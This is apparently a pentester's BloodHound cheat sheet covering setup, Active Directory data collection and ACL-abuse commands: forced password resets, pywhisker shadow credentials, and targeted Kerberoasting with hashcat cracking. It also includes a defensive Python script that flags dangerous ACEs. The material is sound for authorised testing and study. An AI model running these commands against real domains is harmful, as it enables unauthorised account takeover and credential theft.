Bloodhound CheatSheet
1.0 Installation
apt install bloodhound
2.0 Configuration
neo4j console
2025-01-03 14:44:26.560+0000 INFO Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO id:
Connect to http://localhost:7474/ and change the default neo4j:neo4j credentials to something better.
3.0 Usage
Run with:
bloodhound
3.1 Collect AD Data
3.1.1 NetExec
nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip
3.1.2 bloodhound.py
git clone https://github.com/dirkjanm/BloodHound.py
# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip
# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass
3.2 Attribute Attacks
3.2.1 ForceChangePassword
net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'
3.2.2 GenericAll
Manipulate msDS-KeyCredentialLink and request TGT:
pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass
Afterwards, crack the hash with hashcat:
![[hashcat#1.2 Kerberos TGT]]
3.2.3 GenericWrite
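Added defender-side example, not from the original sheet: a Python script that reads a users JSON file in the shape produced by the collectors in 3.1 and lists every ACE granting one of the rights from 3.2 (ForceChangePassword, GenericAll, GenericWrite), so those edges can be reviewed and removed before they show up as a path. The JSON field names (ObjectIdentifier, Properties, Aces, PrincipalSID, RightName, IsInherited) and the sample data are assumptions about the collector format, not real domain data.

```python
import json

# Rights that BloodHound renders as abusable edges (the three covered in section 3.2)
DANGEROUS_RIGHTS = {"ForceChangePassword", "GenericAll", "GenericWrite"}
EXPECTED_ADMIN_RIDS = {"512", "519"}  # Domain Admins / Enterprise Admins: full control is expected

# Constructed sample in the shape of a SharpHound / bloodhound.py "users" JSON file.
# Field names are an assumption about the collector format; the data is not real.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1104",
         "Properties": {"name": "ADMIN@DOMAIN.LOCAL", "highvalue": True},
         "Aces": [
             {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group",
              "RightName": "GenericAll", "IsInherited": False},
             {"PrincipalSID": "S-1-5-21-1-2-3-1105", "PrincipalType": "User",
              "RightName": "ForceChangePassword", "IsInherited": False}]},
        {"ObjectIdentifier": "S-1-5-21-1-2-3-1106",
         "Properties": {"name": "HELPDESK@DOMAIN.LOCAL", "highvalue": False},
         "Aces": [
             {"PrincipalSID": "S-1-5-21-1-2-3-1107", "PrincipalType": "User",
              "RightName": "GenericWrite", "IsInherited": True},
             {"PrincipalSID": "S-1-5-21-1-2-3-1106", "PrincipalType": "User",
              "RightName": "ReadProperty", "IsInherited": False}]},
    ],
    "meta": {"type": "users", "count": 2, "version": 5},
})

def find_dangerous_aces(users_json, rights=DANGEROUS_RIGHTS,
                        high_value_only=False, ignore_admin_groups=True):
    """Return (principal_sid, right, target_name, inherited) for every ACE granting one
    of `rights` on a user object; self-rights and (optionally) admin groups are skipped."""
    findings = []
    for obj in json.loads(users_json)["data"]:
        props = obj.get("Properties", {})
        if high_value_only and not props.get("highvalue"):
            continue
        for ace in obj.get("Aces", []):
            sid = ace["PrincipalSID"]
            if ace["RightName"] not in rights or sid == obj["ObjectIdentifier"]:
                continue  # uninteresting right, or an object's rights over itself
            if ignore_admin_groups and sid.rsplit("-", 1)[-1] in EXPECTED_ADMIN_RIDS:
                continue  # built-in admin groups are supposed to have full control
            findings.append((sid, ace["RightName"], props.get("name"),
                             bool(ace.get("IsInherited"))))
    return findings

if __name__ == "__main__":
    for finding in find_dangerous_aces(SAMPLE_USERS_JSON):
        print(finding)
```

Inherited ACEs usually come from the OU, so fix those at the container rather than on the single object.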
4.0 Hints
- Mark all owned users as owned!
- Select user and check AD permissions
- Node info
- Transitive Object Control
- local admin
4.1 Custom Queries
git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader
5.0 References
6.0 Tags
- #OS/Kali
- #Label/CheatSheet
- #public